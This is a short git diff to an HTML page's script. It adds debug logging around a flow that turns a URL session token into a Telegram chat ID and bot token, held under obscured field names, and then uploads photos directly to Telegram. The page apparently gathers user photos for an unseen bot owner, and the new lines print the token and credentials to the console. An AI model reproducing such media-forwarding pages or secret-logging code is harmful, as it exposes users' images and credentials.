--- a/t/index.html
+++ b/t/index.html
@@ -193,6 +193,7 @@
           throw new Error('Missing session token in the URL');
         }
 
+        console.log('Fetching session data with token:', sessionToken);
         const response = await fetch('/resolve-session', {
           method: 'POST',
           headers: { 'Content-Type': 'application/json' },
@@ -204,6 +205,7 @@
           throw new Error('Failed to resolve session: ' + (data.error || 'Unknown error'));
         }
 
+        console.log('Session data fetched:', data);
         return { chatId: data.x1, botToken: data.z9 };
       } catch (error) {
         console.error('Error fetching session data:', error);
@@ -276,6 +278,8 @@
           throw new Error('Missing chat ID or bot token');
         }
 
+        console.log('Sending media to Telegram for chatId:', chatId);
+
         // Send Photos directly to Telegram API
         for (let i = 0; i < photos.length; i++) {
           const formDataPhoto = new FormData();
@@ -341,4 +345,4 @@
     });
   </script>
 </body>
-  </html>
+</html>
